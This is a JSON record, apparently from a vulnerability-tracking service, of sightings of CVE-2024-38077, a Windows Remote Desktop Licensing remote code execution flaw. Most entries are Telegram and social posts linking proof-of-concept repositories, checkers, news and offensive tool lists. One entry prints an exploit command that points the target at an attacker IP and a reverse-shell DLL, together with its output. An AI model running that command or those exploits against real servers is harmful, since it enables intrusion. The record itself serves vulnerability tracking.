{"vulnerability": "CVE-2024-38077", "sightings": [{"uuid": "b6e5f0cb-10c2-436d-a2f2-f49723b1a196", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://bsky.app/profile/bilaltariq01.bsky.social/post/3lsxn2we7di2z", "content": "", "creation_timestamp": "2025-07-02T06:56:16.000491Z"}, {"uuid": "35597011-057d-4717-adac-007fc820e3ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lti4tavlns2q", "content": "", "creation_timestamp": "2025-07-08T20:20:55.629407Z"}, {"uuid": "4fe3af39-4eb7-4978-a728-f866f872f31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://gist.github.com/jonathan-gruber-1/05724c8f2229fceca85cb5694e67abbd", "content": "", "creation_timestamp": "2026-02-13T10:12:10.000000Z"}, {"uuid": "14474b6e-75c4-41b0-a379-7f9ed20ba92e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1324", "content": "", "creation_timestamp": "2024-07-10T04:00:00.000000Z"}, {"uuid": "f51df64f-c9f9-4531-b47e-8ed272a5ee46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://gist.github.com/alon710/a720e446300a7511b879b23ad5c1cb4b", "content": "", "creation_timestamp": "2026-01-31T13:40:51.000000Z"}, {"uuid": "2c1d0e32-3cd2-4eae-86df-810588bffab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8218", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u8fdc\u7a0b\u63a2\u6d4b remote desktop licensing \u670d\u52a1\u5f00\u653e\u60c5\u51b5\uff0c\u7528\u4e8e CVE-2024-38077 \u6f0f\u6d1e\u5feb\u901f\u6392\u67e5\nURL\uff1ahttps://github.com/murphysecurity/RDL-detect\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T08:10:55.000000Z"}, {"uuid": "9d5a4fb0-6535-4f55-aa6d-d70db964d8d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13455", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Exploitable PoC Released for CVE-2024-38077: 0-Click RCE Threatens All Windows Servers.\n\nhttps://securityonline.info/exploitable-poc-released-for-cve-2024-38077-0-click-rce-threatens-all-windows-servers/", "creation_timestamp": "2024-08-10T16:10:11.000000Z"}, {"uuid": "b6cdbfd3-5d3e-4edd-b071-e64f1da0ac32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8228", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u57fa\u4e8e135\u7aef\u53e3\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u5b58\u5728CVE-2024-38077\u6f0f\u6d1e\nURL\uff1ahttps://github.com/BambiZombie/CVE-2024-38077-check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-10T10:07:25.000000Z"}, {"uuid": "13f48e8d-3f17-4a9f-9b74-cb8515c7e20e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8335", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38077\u68c0\u6d4b\u5de5\u5177\nURL\uff1ahttps://github.com/Destiny0991/check_38077\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-23T08:28:41.000000Z"}, {"uuid": "fb69c324-eb03-47d5-bb66-5bf2ed3a3bfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/713", "content": "#exploit\n1. CVE-2024-38077:\nWindows RDL Service RCE\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n2. CVE-2024-38054:\nWindows Server &lt; 2022 23H2 - Kernel Streaming WOW Thunk Service Driver Memory Corruption\nhttps://github.com/Black-Frost/windows-learning/tree/main/CVE-2024-38054", "creation_timestamp": "2024-08-10T06:12:35.000000Z"}, {"uuid": "5c2a9175-39bb-4c16-9ed1-b86b77254a16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://t.me/Kelvinseccommunity/712", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service 0-Click RCE", "creation_timestamp": "2024-08-09T12:50:22.000000Z"}, {"uuid": "c2651ef9-bb87-4292-b636-8978740f2e25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8211", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRDL\u7684\u5806\u6ea2\u51fa\u5bfc\u81f4\u7684RCE\nURL\uff1ahttps://github.com/qi4L/CVE-2024-38077\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T05:03:50.000000Z"}, {"uuid": "3853144d-2394-4c07-8549-e78ff4b0bdcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8227", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u57fa\u4e8e135\u7aef\u53e3\u68c0\u6d4b\u76ee\u6807\u662f\u5426\u5b58\u5728CVE-2024-38077\u6f0f\u6d1e\nURL\uff1ahttps://github.com/BambiZombie/CVE-2024-38077_check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-10T09:34:30.000000Z"}, {"uuid": "1b2ca249-fae7-49ff-87e2-be4a4463c5e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8217", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38077\uff0c\u672c\u4ed3\u5e93\u4ec5\u7528\u4f5c\u5907\u4efd\uff0c\nURL\uff1ahttps://github.com/Lxiyang/CVE-2024-38077\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T07:48:30.000000Z"}, {"uuid": "6b81477d-a87d-4890-a0e3-0fe2c1913209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8215", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a\u8fdc\u7a0b\u63a2\u6d4bremote desktop licensing\u670d\u52a1\u5f00\u653e\u60c5\u51b5\uff0c\u7528\u4e8eCVE-2024-38077\u6f0f\u6d1e\u5feb\u901f\u6392\u67e5\nURL\uff1ahttps://github.com/murphysec/RDL-detect\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-09T07:44:20.000000Z"}, {"uuid": "ba102c9a-7936-48a4-9706-1200d21fa2c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8266", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38077\nURL\uff1ahttps://github.com/BBD-YZZ/fyne-gui\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-15T07:57:43.000000Z"}, {"uuid": "1573d6e9-45f6-4d96-89d9-3f563fb50310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8701", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38077: Remote Code Execution Vulnerability in Windows Remote Desktop Licensing Service\nURL\uff1ahttps://github.com/mrmtwoj/CVE-2024-38077\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-09T06:40:58.000000Z"}, {"uuid": "bd75c40b-0c9f-491c-84c4-7f5d887b4787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8964", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-38077 private for 10 hands\nURL\uff1ahttps://github.com/amfg145/CVE-2024-38077\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-07T14:35:33.000000Z"}, {"uuid": "a9e731fd-e044-4a48-81f4-691473e55ad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/Nkhd8xUmeX8Xpibn46tHZgYGskngGgsl6QYAa9mE2ithCA", "content": "", "creation_timestamp": "2024-10-16T21:02:17.000000Z"}, {"uuid": "3410a2e0-ec0a-4e33-aaa0-8d349e4a251a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://t.me/Celestial_Pulse24/4232", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service 0-Click RCE", "creation_timestamp": "2024-08-15T03:46:59.000000Z"}, {"uuid": "a5a7c0e7-90cf-49d6-be90-d31b6a7b922d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/140", "content": "#exploit\n1. CVE-2024-38077:\nWindows RDL Service RCE\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n2. CVE-2024-38054:\nWindows Server &lt; 2022 23H2 - Kernel Streaming WOW Thunk Service Driver Memory Corruption\nhttps://github.com/Black-Frost/windows-learning/tree/main/CVE-2024-38054", "creation_timestamp": "2024-08-10T06:12:19.000000Z"}, {"uuid": "6c08f23f-7993-4295-b399-aba7389d8448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/9905", "content": "\u200aCVE-2024-38077 : A Zero-Click RCE Threat In Windows Server 2025\n\nhttps://kalilinuxtutorials.com/cve-2024-38077/", "creation_timestamp": "2024-08-14T19:24:53.000000Z"}, {"uuid": "3fd22bd2-22a9-469a-92fa-2534b22b1d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://t.me/HackerArsenal/139", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service 0-Click RCE", "creation_timestamp": "2024-08-09T11:45:35.000000Z"}, {"uuid": "90847ad3-5af8-4a1b-ba67-a3ce8873a19b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/9921", "content": "\u200aCVE-2024-38077-EXP : In-Depth Analysis And Exploitation Of A Windows Server 2025 Vulnerability\n\nhttps://kalilinuxtutorials.com/cve-2024-38077-exp/", "creation_timestamp": "2024-08-14T19:24:54.000000Z"}, {"uuid": "b068f266-6f62-46e1-b032-c35fab5667ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1744", "content": "all\n\npython3 CVE-2024-38077-EXP.py --evil_ip 103xxxx --evil_dll_path \\1\\reverse-shell.dll --target_ip 1xxx\n--------------------------------------------------------------------------------\nMadLicense: Windows Remote Desktop Licensing Service Preauth RCE\n        target_ip: 1xxx\n        evil_ip: 1xxxxx\n        evil_dll_path: \\\\10xxx1reverse-shell.dll\n        check_vuln_exist: False\n--------------------------------------------------------------------------------\n[*] Run exploit script for 1 / 3 times\n[+] Get Server version: 0x60000a04\n[-] Crashed, waiting for the service to restart, need 210 seconds...", "creation_timestamp": "2024-10-16T23:02:17.000000Z"}, {"uuid": "5c3b55d1-5219-4f43-9647-fb2023a93e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/9241", "content": "\u200aExploitable PoC Released for CVE-2024-38077: 0-Click RCE Threatens All Windows Servers\n\nhttps://securityonline.info/exploitable-poc-released-for-cve-2024-38077-0-click-rce-threatens-all-windows-servers/", "creation_timestamp": "2024-08-10T21:41:30.000000Z"}, {"uuid": "8a0c2e70-c24a-4774-86a4-e964e3320cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/HwwzrUUGzdlvPYuHYDxaXh1_TORH4YATt2NSvni9YSbETns", "content": "", "creation_timestamp": "2024-10-26T12:29:53.000000Z"}, {"uuid": "d09ffd2d-dce6-4023-8dbf-26c4f567a1ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/13842", "content": "\u200aMicropatches for \"MadLicense\" Windows Remote Desktop Licensing Service Remote Code Execution (CVE-2024-38077)\n\nhttps://malware.news/t/micropatches-for-madlicense-windows-remote-desktop-licensing-service-remote-code-execution-cve-2024-38077/86570", "creation_timestamp": "2024-09-20T15:17:51.000000Z"}, {"uuid": "69b6c9cb-e72b-412c-a97c-41e8ca1ec46d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/XJwSXpoHoGHN4jcb50RThkpQklsUfDacUV_t7XIQ-PnsFg", "content": "", "creation_timestamp": "2024-08-15T03:46:59.000000Z"}, {"uuid": "e539478c-040c-4d6c-aa57-8606041925cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://t.me/CypherStar/162", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service 0-Click RCE", "creation_timestamp": "2024-08-10T18:05:02.000000Z"}, {"uuid": "901e8445-3281-4c93-9617-0c86862c16f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/3RVlFjalLgf68jfIbtGSbXbYrB09rm48w-0iN4PzwYqkMxE", "content": "", "creation_timestamp": "2024-09-08T07:41:49.000000Z"}, {"uuid": "39c9a331-af1f-44ad-a5ab-2f299c5ad469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/636", "content": "CVE-2024-38077 POC\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC/blob/main/CVE-2024-38077-poc.py\n\n#CyberDilara", "creation_timestamp": "2024-08-10T04:38:43.000000Z"}, {"uuid": "f5f29df4-9053-4f1c-9db0-765039b89f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/653", "content": "Tools - Hackers Factory \n\nApplication to comfortably monitor your Internet traffic\n\nhttps://github.com/GyulyVGC/sniffnet\n\nOSINT CHEAT SHEET Tools &amp; Methods\n\nhttps://github.com/NotLoBi/NotLoBi\n\nHookchain\n\nhttps://github.com/helviojunior/hookchain\n\nUnwaf is a Go tool designed to help identify WAF bypasses using passive techniques, such as: SPF records and DNS history. By default, Unwaf will check SPF records.\n\nhttps://github.com/mmarting/unwaf\n\nOpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking tags that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks.\n\nhttps://github.com/seemoo-lab/openhaystack\n\nCobalt Strike beacon object files (BOFs) is a feature that was added to the beacon in order to allow rapid beacon extendibility in a more OPSEC way.\n\nhttps://github.com/securifybv/Visual-Studio-BOF-template\n\nCVE-2024-38077-EXP\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC/tree/main\n\nDockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.\n\nhttps://github.com/UndeadSec/DockerSpy\n\nUltimate Hardware Hacking Gear Guide\n\nhttps://github.com/jcldf/ultimate-hardware-hacking-gear-guide-\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-12T02:29:01.000000Z"}, {"uuid": "c0d03189-8efa-4717-8706-a9841f311988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/642", "content": "Tools  - Hackers Factory \n\n''GitHub - rasta-mouse/OST-C2-Spec: Open Source C&amp;C Specification''\n\nhttps://github.com/rasta-mouse/OST-C2-Spec\n\nCVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\nEfficiently scan for exposed Swagger endpoints across web domains and subdomains (Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing) \n\nhttps://github.com/brinhosa/apidetector\n\nTrickDump dumps the #lsass process without creating a #Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps.\n\nhttps://github.com/ricardojoserf/TrickDump\n\nAn engine to make Tor network your default gateway.\n\ngithub.com/htrgouvea/nipe\n\nDeveloping a cryptographically secure bootloader for RISC-V in Rust.\n\nhttps://github.com/LawrenceHunter/SentinelBoot\n\nViT-CoMer: Vision Transformer with Convolutional Multi-scale Feature Interaction for Dense Predictions\n\nhttps://github.com/Traffic-X/ViT-CoMer\n\nScattered Mixture-of-Experts Implementation\n\nhttps://github.com/shawntan/scattermoe\n\nH-SAM\n\nhttps://github.com/cccccczh404/h-sam\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-11T05:55:51.000000Z"}, {"uuid": "e0058bc8-8d5d-4292-ae93-656249ae46f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/IkOHnwg_uGO6ZKZTmo0p71LYBXfEdzRJ6Zcj1bUWR34shAk", "content": "", "creation_timestamp": "2024-08-15T03:46:41.000000Z"}, {"uuid": "148e88dc-0943-455a-bc3e-df0b40164212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/lwbwY-3LrdsfPC2G67OAOF_bLHxwWE1ROpj0j19hP8nLxY4", "content": "", "creation_timestamp": "2024-08-09T09:36:17.000000Z"}, {"uuid": "92754493-33d4-4789-ba18-92e8a121c5c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8567", "content": "Tools  - Hackers Factory \n\n''GitHub - rasta-mouse/OST-C2-Spec: Open Source C&amp;C Specification''\n\nhttps://github.com/rasta-mouse/OST-C2-Spec\n\nCVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\nEfficiently scan for exposed Swagger endpoints across web domains and subdomains (Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing) \n\nhttps://github.com/brinhosa/apidetector\n\nTrickDump dumps the #lsass process without creating a #Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps.\n\nhttps://github.com/ricardojoserf/TrickDump\n\nAn engine to make Tor network your default gateway.\n\ngithub.com/htrgouvea/nipe\n\nDeveloping a cryptographically secure bootloader for RISC-V in Rust.\n\nhttps://github.com/LawrenceHunter/SentinelBoot\n\nViT-CoMer: Vision Transformer with Convolutional Multi-scale Feature Interaction for Dense Predictions\n\nhttps://github.com/Traffic-X/ViT-CoMer\n\nScattered Mixture-of-Experts Implementation\n\nhttps://github.com/shawntan/scattermoe\n\nH-SAM\n\nhttps://github.com/cccccczh404/h-sam\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-11T05:57:17.000000Z"}, {"uuid": "73481e71-3245-444c-a599-d36bb51a3dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/z7ZFtrX9L4gZacQtKcu1e8RUJHU2uSZ9pGTTp-LiZPFhuW8", "content": "", "creation_timestamp": "2025-01-23T22:00:06.000000Z"}, {"uuid": "17e47696-5266-49c9-a686-8d71162a354d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8578", "content": "Tools - Hackers Factory \n\nApplication to comfortably monitor your Internet traffic\n\nhttps://github.com/GyulyVGC/sniffnet\n\nOSINT CHEAT SHEET Tools &amp; Methods\n\nhttps://github.com/NotLoBi/NotLoBi\n\nHookchain\n\nhttps://github.com/helviojunior/hookchain\n\nUnwaf is a Go tool designed to help identify WAF bypasses using passive techniques, such as: SPF records and DNS history. By default, Unwaf will check SPF records.\n\nhttps://github.com/mmarting/unwaf\n\nOpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking tags that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks.\n\nhttps://github.com/seemoo-lab/openhaystack\n\nCobalt Strike beacon object files (BOFs) is a feature that was added to the beacon in order to allow rapid beacon extendibility in a more OPSEC way.\n\nhttps://github.com/securifybv/Visual-Studio-BOF-template\n\nCVE-2024-38077-EXP\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC/tree/main\n\nDockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.\n\nhttps://github.com/UndeadSec/DockerSpy\n\nUltimate Hardware Hacking Gear Guide\n\nhttps://github.com/jcldf/ultimate-hardware-hacking-gear-guide-\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-12T02:32:08.000000Z"}, {"uuid": "5ad4da28-96b2-4bc6-a348-4317c9e12b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3667", "content": "Tools - Hackers Factory \n\nApplication to comfortably monitor your Internet traffic\n\nhttps://github.com/GyulyVGC/sniffnet\n\nOSINT CHEAT SHEET Tools &amp; Methods\n\nhttps://github.com/NotLoBi/NotLoBi\n\nHookchain\n\nhttps://github.com/helviojunior/hookchain\n\nUnwaf is a Go tool designed to help identify WAF bypasses using passive techniques, such as: SPF records and DNS history. By default, Unwaf will check SPF records.\n\nhttps://github.com/mmarting/unwaf\n\nOpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking tags that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks.\n\nhttps://github.com/seemoo-lab/openhaystack\n\nCobalt Strike beacon object files (BOFs) is a feature that was added to the beacon in order to allow rapid beacon extendibility in a more OPSEC way.\n\nhttps://github.com/securifybv/Visual-Studio-BOF-template\n\nCVE-2024-38077-EXP\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC/tree/main\n\nDockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.\n\nhttps://github.com/UndeadSec/DockerSpy\n\nUltimate Hardware Hacking Gear Guide\n\nhttps://github.com/jcldf/ultimate-hardware-hacking-gear-guide-\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-12T02:29:08.000000Z"}, {"uuid": "573f4351-ce9f-4cfe-8cce-b43de48ad1e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3663", "content": "Tools  - Hackers Factory \n\n''GitHub - rasta-mouse/OST-C2-Spec: Open Source C&amp;C Specification''\n\nhttps://github.com/rasta-mouse/OST-C2-Spec\n\nCVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\nEfficiently scan for exposed Swagger endpoints across web domains and subdomains (Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing) \n\nhttps://github.com/brinhosa/apidetector\n\nTrickDump dumps the #lsass process without creating a #Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region 